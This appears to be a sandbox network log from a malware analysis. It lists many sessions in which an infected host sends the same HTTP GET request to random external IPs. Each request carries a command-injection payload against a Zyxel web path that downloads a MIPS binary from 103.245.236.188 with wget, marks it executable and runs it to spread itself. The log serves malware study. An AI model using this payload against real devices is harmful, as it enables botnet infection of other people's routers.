                                                Jan 12, 2024 18:16:09.122294903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                865192.168.2.2339042122.248.101.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122324944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                866192.168.2.2352004107.163.147.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122370005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                867192.168.2.235235876.158.62.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122404099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                868192.168.2.2357120186.69.21.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122451067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                869192.168.2.235353243.197.196.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122479916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                870192.168.2.2340216122.126.89.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122483015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                871192.168.2.2335600202.30.61.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122531891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                872192.168.2.2333824100.208.253.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122574091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                873192.168.2.235736486.227.153.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122606993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                874192.168.2.234677471.123.37.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122632027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                875192.168.2.2337994163.15.178.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122668982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                876192.168.2.2348384169.126.83.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122720957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                877192.168.2.2351938205.150.172.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122756958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                878192.168.2.234707264.204.54.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122773886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                879192.168.2.2337828186.59.152.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122818947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                880192.168.2.2334280199.201.244.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122860909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                881192.168.2.2332810174.49.42.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122921944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                882192.168.2.233735234.78.138.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122936964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                883192.168.2.2334730210.90.104.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122953892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                884192.168.2.2360364172.132.134.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.122996092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                885192.168.2.234980049.250.67.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123034000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                886192.168.2.235050447.173.250.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123068094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                887192.168.2.235885072.182.186.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123111010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                888192.168.2.2353544219.247.71.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123155117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                889192.168.2.2340988174.214.191.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123189926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                890192.168.2.2360100150.173.138.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123244047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                891192.168.2.2353170155.108.165.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123310089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                892192.168.2.2340772171.245.134.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123332977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                893192.168.2.2356746132.180.174.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123359919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                894192.168.2.233627044.243.224.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123406887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                895192.168.2.233864676.8.87.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123437881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                896192.168.2.235934670.4.242.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123481989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                897192.168.2.2333874142.45.116.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123524904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                898192.168.2.233491847.167.152.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123548031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                899192.168.2.233357683.227.235.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123600006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                900192.168.2.2335322136.214.109.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123630047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                901192.168.2.2338130195.194.157.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123667002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                902192.168.2.235898283.17.215.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123733997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                903192.168.2.2334544197.222.58.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123754025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                904192.168.2.23582984.37.18.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123797894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                905192.168.2.2346208193.112.85.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123838902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                906192.168.2.235830076.25.195.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123884916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                907192.168.2.2334844203.232.144.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123913050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                908192.168.2.2339802223.249.215.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123944998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                909192.168.2.2339384182.187.238.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.123987913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                910192.168.2.2356754193.211.80.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124043941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                911192.168.2.2345394177.161.12.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124079943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                912192.168.2.2349294159.31.208.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124104023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                913192.168.2.2337982132.165.245.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124165058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                914192.168.2.235337240.24.210.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124174118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                915192.168.2.2352054156.198.135.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124232054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                916192.168.2.2353076130.183.15.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124269009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                917192.168.2.234636638.248.157.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124311924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                918192.168.2.2338468151.9.118.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124356031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                919192.168.2.23584944.214.210.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124386072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                920192.168.2.235500489.196.157.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124408007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                921192.168.2.2359990190.37.140.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124464989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                922192.168.2.2340672120.90.9.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124501944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                923192.168.2.2356608165.189.120.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124531984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                924192.168.2.2335864133.184.27.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124566078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                925192.168.2.233823424.225.132.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124599934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                926192.168.2.234465876.213.56.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.124629021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                927192.168.2.2358554220.173.110.17443
                                                TimestampBytes transferredDirectionData
